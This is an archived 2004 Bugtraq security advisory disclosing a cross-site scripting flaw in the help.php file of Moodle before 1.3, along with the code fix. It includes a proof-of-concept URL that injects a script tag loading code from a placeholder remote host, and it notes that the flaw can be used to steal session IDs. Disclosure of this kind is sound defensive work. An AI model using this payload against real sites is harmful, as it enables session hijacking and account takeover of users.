Cross Site Scripting in Moodle < 1.3

From: Bartek Nowotarski (silence10_at_wp.pl)
Date: 04/30/04

  • Next message: OpenPKG: "[OpenPKG-SA-2004.018] OpenPKG Security Advisory (proftpd)" 
    Date: 30 Apr 2004 20:34:54 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is)

                          Cross Site Scripting in Moodle < 1.3
                          ====================================
                                      2004-04-30

    [01] Author:
    ~~~~~~~~~~~~
    author: Bartek Nowotarski (silence)
    location: Trzebinia, Poland
    mail: silence10(at)wp(dot)pl
    site: silence(dot)0(dot)pl

    [02] Discussion:
    ~~~~~~~~~~~~~~~~
    "Moodle is a course management system (CMS) - a software package designed to
    help educators create quality online courses. Such e-learning systems are
    sometimes also called Learning Management Systems (LMS) or Virtual Learning
    Environments (VLE)." www.moodle.org
    It has over 1000 *register* sites in 75 countries.

    Project home site: http://www.moodle.org

    [03] Bug:
    ~~~~~~~~~
    It is possible to execute any HTML/javascript command in help.php file by
    requesting:
    ------------------------------------------
    http://{some_moodle_site}/help.php?text=&lt;script
    src={url_to_script_to_execute}>&lt;/script&gt;
    ------------------------------------------
    A code in {url_to_script_to_execute} will be executed.
    Bug enables to get users' session id's by writing a special script and use it
    to login as any user.

    [04] Solution:
    ~~~~~~~~~~~~~~
    a) This bug have been fixed in version 1.3.
    b) For version 1.2 replace line 75:
        --------------------------------
    75| echo "$text";
        --------------------------------
    with
        --------------------------------
    75| echo clean_text($text);
        --------------------------------

    [05] Credits:
    ~~~~~~~~~~~~~
    Vulnerability discovered by Bartek Nowotarski (silence). All rights reserved.

    [06] Disclaimer:
    ~~~~~~~~~~~~~~~~
    This document and all the information it contains are provided "as is",
    for educational purposes only, without warranty of any kind, whether
    express or implied.

    --EOF--

  • Next message: OpenPKG: "[OpenPKG-SA-2004.018] OpenPKG Security Advisory (proftpd)"